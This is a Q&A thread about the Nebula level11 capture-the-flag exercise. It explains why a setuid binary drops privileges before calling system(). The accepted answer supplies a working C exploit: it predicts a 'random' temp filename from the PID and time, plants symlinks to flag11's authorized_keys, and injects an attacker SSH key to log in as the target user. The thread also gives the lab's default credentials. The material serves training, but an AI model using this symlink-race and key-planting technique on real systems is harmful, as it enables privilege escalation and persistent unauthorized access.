# Nebula level11: setuid is not working

Tags: linux, exploit, privilege-escalation

I am trying to solve the [level11](https://exploit-exercises.com/nebula/level11/) of [Nebula 5](https://exploit-exercises.com/nebula/) on the [`exploit-exercises.com`](https://exploit-exercises.com/) platform.

I do believe I got the basic idea of the challenge, in fact you can find quite numerous write-ups of this level on Internet:

- [jc han](http://hanjc.me/post/2014-01-26-nebula-level11/)
- [Cybergibbons](http://cybergibbons.com/security-2/nebula-walkthrough/nebula-exploit-exercises-walkthrough-level11/)
- and so on...

The problem is when trying to run the `getflag`, it seems that the `setuid` bit is lost during the execution. I know that `/tmp/` is mounted with the option `nosuid` and, therefore, you cannot put a suid program on it. But, it was not my case when I tried it.

I wonder if someone can tell me what really happen here and if it is an unintended bug in this challenge and how to work-around it (possibly through root).

I seems to me that I did not yet clearly understood the mechanism of the `setuid` bit as it seems to be extremely fragile when calling `system()`.

Also, some write-ups mention the fact that `bash` disable the `setuid` bit which seems to me quite dubious (I tried to run `setuid` programs and got it to run). I somebody can give some insight about it, I would also be pleased.

### EDIT

As suggested by Gilles, I am adding a few more details on the problem here.

So, basically, the easiest way to exploit this level is to use the fact that if you set `Content-Length` to 1 (write `Content-Length: 1` on `stdin`) and, then, type a letter (which get translated in another one by a deterministic process). The string you get will not be null (`\0`) terminated and the content of the string will be appended to the current content of the memory. Then, the whole string will go through the `system()` function.

The fact is that you are quite likely to find `\0` characters in memory and, thus, be able to call the letter you got as a command.

Then, you just have to set up a symbolic link from `D` to `getflag` (the software used to get the flag of a level) and add the location of `D` to your `PATH` variable. It should give something like that:

```
level11@nebula:/tmp$ echo -ne "Content-Length: 1\nE" | /home/flag11/flag11 
sh: DPo: command not found
level11@nebula:/tmp$ echo -ne "Content-Length: 1\nE" | /home/flag11/flag11 
sh: $'D\260@': command not found
level11@nebula:/tmp$ echo -ne "Content-Length: 1\nE" | /home/flag11/flag11 
sh: $'D\220': command not found
level11@nebula:/tmp$ echo -ne "Content-Length: 1\nE" | /home/flag11/flag11 
sh: D: command not found
```

Then, adding the symbolic link to `getflag`:

```
level11@nebula:/tmp$ echo -ne "Content-Length: 1\nE" | /home/flag11/flag11 
getflag is executing on a non-flag account, this doesn't count
```

So, the problem is that the `/home/flag11/flag11` software is `setuid` with the following rights:

```
-rwsr-x--- 1 flag11 level11 12135 2012-08-19 20:55 /home/flag11/flag11*
```

Note that, the '*attacker user*' is `level11` and the '*target user*' is `flag11`.

Nevertheless, it seems that the `setuid` bit is not honored by the program and you turn back to `level11` when you run the `getflag` program (but you are `flag11` during the execution of `/home/flag11/flag11`.

So, my question is "Why?".

And, I should also add the fact that the other levels seems to work properly. Meaning that this is not the first setuid exploitation on this system, and all others seems to work fine.

Answer (score 4, accepted):

## How I solved Nebula Level 11

The needed files are located under `/home/flag11` let's take a look

```
level11@nebula:~$ ls ../flag11/ -all
total 21
drwxr-x--- 1 flag11 level11   100 2016-12-20 15:11 .
drwxr-xr-x 1 root   root      140 2012-08-27 07:18 ..
-rw------- 1 flag11 flag11     14 2016-12-20 15:11 .bash_history
-rw-r--r-- 1 flag11 flag11    220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag11 flag11   3353 2011-05-18 02:54 .bashrc
drwx------ 2 flag11 flag11     60 2016-12-20 15:08 .cache
-rwsr-x--- 1 flag11 level11 12135 2012-08-19 20:55 flag11
-rw-r--r-- 1 flag11 flag11    675 2011-05-18 02:54 .profile
drwxr-xr-x 1 flag11 flag11     60 2016-12-20 15:07 .ssh
```

This little `.ssh` folder raises some kind of alarm signal in my brain. Maybe we need this later on. As you can see some of the files had been recently accessed. This was due to my attack.

The attached C code of the exercise is the following:

```
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>

/*
 * Return a random, non predictable file, and return the file descriptor for it.
 */

int getrand(char **path)
{
  char *tmp;
  int pid;
  int fd;

  srandom(time(NULL));

  tmp = getenv("TEMP");
  pid = getpid();

  asprintf(path, "%s/%d.%c%c%c%c%c%c", tmp, pid,
      'A' + (random() % 26), '0' + (random() % 10),
      'a' + (random() % 26), 'A' + (random() % 26),
      '0' + (random() % 10), 'a' + (random() % 26));

  fd = open(*path, O_CREAT|O_RDWR, 0600);
  unlink(*path);
  return fd;
}

void process(char *buffer, int length)
{
  unsigned int key;
  int i;

  key = length & 0xff;

  for(i = 0; i < length; i++) {
      buffer[i] ^= key;
      key -= buffer[i];
  }

  system(buffer);
}

#define CL "Content-Length: "

int main(int argc, char **argv)
{
  char line[256];
  char buf[1024];
  char *mem;
  int length;
  int fd;
  char *path;

  if(fgets(line, sizeof(line), stdin) == NULL) {
      errx(1, "reading from stdin");
  }

  if(strncmp(line, CL, strlen(CL)) != 0) {
      errx(1, "invalid header");
  }

  length = atoi(line + strlen(CL));

  if(length < sizeof(buf)) {
      if(fread(buf, length, 1, stdin) != length) {
          err(1, "fread length");
      }
      process(buf, length);
  } else {
      int blue = length;
      int pink;

      fd = getrand(&path);

      while(blue > 0) {
          printf("blue = %d, length = %d, ", blue, length);

          pink = fread(buf, 1, sizeof(buf), stdin);
          printf("pink = %d\n", pink);

          if(pink <= 0) {
              err(1, "fread fail(blue = %d, length = %d)", blue, length);
          }
          write(fd, buf, pink);

          blue -= pink;
      }    

      mem = mmap(NULL, length, PROT_READ|PROT_WRITE, MAP_PRIVATE, fd, 0);
      if(mem == MAP_FAILED) {
          err(1, "mmap");
      }
      process(mem, length);
  }

}
```

After analyzing this code `Return a random, non predictable file, and return the file descriptor for it.`. When someone states *non predictable* I try to predict. This needs to be deferred a bit because the rest of the code needs inspections. Just some remarks, on old Linux systems *pid* of an process is pretty predictable. Of course `srandom()` seeded with time is predictable too.

Okay, there is some *XOR* encryption scheme used to decipher the buffer in `process` and this deciphered buffer is handed to system. Okay we need to inject some attacking calls here. From the inspection of the files we knew this is yet another `setuid` bit challenge, okay this is getting lame I thought. Frankly I was a bit too optimistic.

In the main function the processing buffer is filled from `stdin`and checked against some hard coded prefix nothing magic here.

```
#define CL "Content-Length: "

int main(int argc, char **argv)
{
  // ...
  if(fgets(line, sizeof(line), stdin) == NULL) {
      errx(1, "reading from stdin");
  }

  if(strncmp(line, CL, strlen(CL)) != 0) {
      errx(1, "invalid header");
  }

  length = atoi(line + strlen(CL));

  if(length < sizeof(buf)) {
      if(fread(buf, length, 1, stdin) != length) {
          err(1, "fread length");
      }
      process(buf, length);
  } else {

  //...
}
```

The `err` functions will exit the executable when they are hit. To bypass the following check `if(fread(buf, length, 1, stdin) != length) {`, the length passed to this executable needs to be one. In this case the injected code is very limited. Tests with overflowing atoi and negative numbers always failed. Because `fread` returns the number of items read and not the number of bytes, in this case it always returns one. Form the other exercises we knew we can pretend the `PATH` variable with a path we have under control. So just we just need to inject a single character into the magic `process()` function. The reverse of the **XOR** is pretty straight forward. You may need some tries to execute your command, this is because the whole buffer is passed to `system`. The buffer is located on the stack of main and because of this it is filled with garbage. But the chances that we hit a zero in the second character is not too bad. I already felt my success but then I got this:

```
getflag is executing on a non-flag account, this doesn't count
```

This time it was not me cheating, but the authors of Nebula the provided source code did not mention that they removed the `setuid` bit before the call to system. This was exposed by the `strace`  command.

```
getgid32()                              = 1012
setgid32(1012)                          = 0
getuid32()                              = 1012
setuid32(1012)                          = 0
rt_sigaction(SIGINT, {SIG_IGN, [], 0}, {SIG_DFL, [], 0}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_IGN, [], 0}, {SIG_DFL, [], 0}, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfa443a8) = 6180
```

Okay, this looks like a dead end. Back to the drawing board, the *SSH* idea popped up again. But how can we use the `.ssh` folder. This is pretty easy we have to inject a `authorized_keys` file there. But how can this be achieved without `setuid`?

```
  } else {
      int blue = length;
      int pink;

      fd = getrand(&path);

      while(blue > 0) {
          printf("blue = %d, length = %d, ", blue, length);

          pink = fread(buf, 1, sizeof(buf), stdin);
          printf("pink = %d\n", pink);

          if(pink <= 0) {
              err(1, "fread fail(blue = %d, length = %d)", blue, length);
          }
          write(fd, buf, pink);

          blue -= pink;
      }    

      mem = mmap(NULL, length, PROT_READ|PROT_WRITE, MAP_PRIVATE, fd, 0);
      if(mem == MAP_FAILED) {
          err(1, "mmap");
      }
      process(mem, length);

}
```

So far I completely ignored the else case of the `buffer` length check. This is where the super top secret temp file name comes into the game. To get control over the file we have to define the environment variable from the shell we run the attack later on:

```
export TEMP=/tmp
```

Now it is just a matter of guessing the *PID* of our victim. This is easy, when we pipe the stdout to the stdin of the victim the chances are high it is just plus one of our own. Otherwise `popen()` could be used and injecting pid from `ps | grep flag11`. The time part is super easy because it is the time in seconds. To get a stable successrate we also use the filename for the next second. The whole attacker code lookks like this:

```
int getrand(char **path, int pid, int time)
{
  char *tmp;
  int fd =  0;

  srandom(time);

  tmp = getenv("TEMP");
  asprintf(path, "%s/%d.%c%c%c%c%c%c", tmp, pid,
      'A' + (random() % 26), '0' + (random() % 10),
      'a' + (random() % 26), 'A' + (random() % 26),
      '0' + (random() % 10), 'a' + (random() % 26));


  return fd;
}

#define CL "Content-Length: "

int main(int argc, char **argv)
{
  char line[256];
  char buf[2048] = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCyS3QqEqbQHTk30QVRpzPVlKjM0px2iMhFfKFP0AmV8vOzCxVLJrYQv0CKPzQDdnszm/H+HrUjBS+c2RY0QB7IPJ8++tuqNEfewoYHJ80NI+7e9mn0HxlN9NCvI6TGX0+1s0VigwtKmq29pP7jHgualoowGrllnk42QI1nvUern6WZUu/Ry+lGyjyYbgd6BSOQpuvnxpxsFDWuk7AsUwrHJijPstS+lsrFZaMEYGqlxHv2hPjCFoADlrTCgusmrwLWsh/ljPfpgzRs2Ts/KF901xpCoHdzzwpckLuoA8+bYznifBp+StDEMkT5gZDygDUTfz5xhYr+KEx1ijHMHvix level11@nebula";

  int pid;
  int fd;
  char *path;
  FILE* stream;

  pid = getpid()+1;
  getrand(&path, pid, time(NULL));
  symlink("/home/flag11/.ssh/authorized_keys",path);
  getrand(&path, pid, time(NULL)+1);
  symlink("/home/flag11/.ssh/authorized_keys",path);
  fprintf(stdout, "%s%d\n%s",CL,sizeof(buf),buf);
}
```

The ssh key needs to be generated first. It took me some tries to fullfill those strange checks with the colors. Maybe one needs to check the format of the `time()` function to not run into overflow issues. At the moment it is not clear to me why it is not neccessary to crypt the buffer. Maybe some speciality of the mmap function. Anyway with the ssh key injected you can log into flag11 account and get your flag.

```
level11@nebula:~$ ./pwn11 | ../flag11/flag11
blue = 2048, length = 2048, pink = 395
blue = 1653, length = 2048, pink = 0
flag11: fread fail(blue = 1653, length = 2048): Operation not permitted
level11@nebula:~$ ssh flag11@localhost

      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/

    exploit-exercises.com/nebula


For level descriptions, please see the above URL.

To log in, use the username of "levelXX" and password "levelXX", where
XX is the level number.

Currently there are 20 levels (00 - 19).


Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)

 * Documentation:  https://help.ubuntu.com/
New release '12.04 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

flag11@nebula:~$ getflag    
You have successfully executed getflag on a target account
flag11@nebula:~$
```

Comment: I confirm it worked for me! I had a bit hard time to get it working because I did not quite understand the trick at first. But, once you get the point of the attack, it is quite clear. Also, the `pid` parameter for `getrand()` is not really useful as it can always be replaced by `getpid() + 1`.

Answer (score 2):

Bash is not involved here. The `system` function runs `sh`, and on Ubuntu, `sh` is not bash, it's dash. Unlike bash, dash does not drop privileges. If the source code shown on that page is compiled and installed with the setuid bit, it'll run as the owning user, and the command it runs through `system` also runs as the owning user.

I haven't looked how the exercise is set up. It's possible that you need to read a file. Given that the program calls `system` without setting `PATH`, you can put a file with a short name in `PATH` to avoid having to make complex calculations on the string that eventually gets passed to `system`. Make that file a shell script that does whatever you need to get the flag, e.g. read a file or call the `getflag` program.

Comment: Thanks for mentioning all that, but I already checked it. The most funny thing about this level is that it seems that none of the write-ups I read about it did actually succeed to get through (the only one pretending to have finished it provide an answer that does not work in practice). And, more surprisingly, none of the write-ups can **explain** why this is not working. So, I am just a bit curious about that.

Comment: @perror From the error message, it appears that this system has bash as `/bin/sh`, which is a change from the Ubuntu default. If the shell invoked by `system` drops privileges, then exploiting this program is a lot harder (you'd need to do some stack smashing). Try setting `POSIXLY_CORRECT=1` in the environment, I don't remember whether that makes bash retain privileges.

Comment: Yes, you are right, I did not noticed that `/bin/sh` is in fact link to `/bin/bash`. I tried your idea by setting it as follow: `echo -ne "Content-Length: 1\nE" | POSIXLY_CORRECT=1 /home/flag11/flag11`, but it did not work (I still get the usual message from `getflag`). Moreover, I tried to run a script through a `/bin/dash` shell, but still nothing... :-/

Comment: @perror `system` calls `sh`, which in your case is bash. Having bash call dash won't help: bash has already dropped privileges.

Comment: I tried to remap the link from `/bin/sh` to `/bin/dash` with no success...

Answer (score 0):

It seems that the binary doesn't match the code on the page.

```
$ gdb /home/flag11/flag11
$ (gdb) disass process
  0x080489c7 <+0>:  push   %ebp
  0x080489c8 <+1>:  mov    %esp,%ebp
  0x080489ca <+3>:  sub    $0x28,%esp
  0x080489cd <+6>:  mov    0xc(%ebp),%eax
  0x080489d0 <+9>:  and    $0xff,%eax
  0x080489d5 <+14>: mov    %eax,-0x10(%ebp)
  0x080489d8 <+17>: movl   $0x0,-0xc(%ebp)
  0x080489df <+24>: jmp    0x8048a0c <process+69>
  0x080489e1 <+26>: mov    -0xc(%ebp),%eax
  0x080489e4 <+29>: add    0x8(%ebp),%eax
  0x080489e7 <+32>: mov    -0xc(%ebp),%edx
  0x080489ea <+35>: add    0x8(%ebp),%edx
  0x080489ed <+38>: movzbl (%edx),%edx
  0x080489f0 <+41>: mov    %edx,%ecx
  0x080489f2 <+43>: mov    -0x10(%ebp),%edx
  0x080489f5 <+46>: xor    %ecx,%edx
  0x080489f7 <+48>: mov    %dl,(%eax)
  0x080489f9 <+50>: mov    -0xc(%ebp),%eax
  0x080489fc <+53>: add    0x8(%ebp),%eax
  0x080489ff <+56>: movzbl (%eax),%eax
  0x08048a02 <+59>: movsbl %al,%eax
  0x08048a05 <+62>: sub    %eax,-0x10(%ebp)
  0x08048a08 <+65>: addl   $0x1,-0xc(%ebp)
  0x08048a0c <+69>: mov    -0xc(%ebp),%eax
  0x08048a0f <+72>: cmp    0xc(%ebp),%eax
  0x08048a12 <+75>: jl     0x80489e1 <process+26>
  0x08048a14 <+77>: call   0x8048700 <getgid@plt>
  0x08048a19 <+82>: mov    %eax,(%esp)
  0x08048a1c <+85>: call   0x8048690 <setgid@plt>    // <---
  0x08048a21 <+90>: call   0x8048630 <getuid@plt>
  0x08048a26 <+95>: mov    %eax,(%esp)
  0x08048a29 <+98>: call   0x8048730 <setuid@plt>    // <---
  0x08048a2e <+103>:    mov    0x8(%ebp),%eax
  0x08048a31 <+106>:    mov    %eax,(%esp)
  0x08048a34 <+109>:    call   0x80486a0 <system@plt>
  0x08048a39 <+114>:    leave  
  0x08048a3a <+115>:    ret
```

It seems that the version that I got drops privileges before calling system.

EDIT: adding more detail as requested.

If you look at the C code here
https://exploit-exercises.com/nebula/level11/

Then the process function looks like this:

```
void process(char *buffer, int length)
{
  unsigned int key;
  int i;

  key = length & 0xff;

  for(i = 0; i < length; i++) {
      buffer[i] ^= key;
      key -= buffer[i];
  }

  system(buffer);
}
```

There's only one function call here -- system(buffer).

If you look at /home/flag11/flag11 with gdb (the code fragment above), you can count 5 calls: getgid,setgid,getuid,setuid,system. The compiled version doesn't match the source code on the webpage. Those additional calls drop privileges before calling system. It might not be possible to solve this challenge.

You can login as user 'nebula' (password 'nebula'), download the code from https://exploit-exercises.com/nebula/level11/, build it, and replace /home/flag11/flag11. Then you can solve this level.

Comment: Could you provide more detailed information please?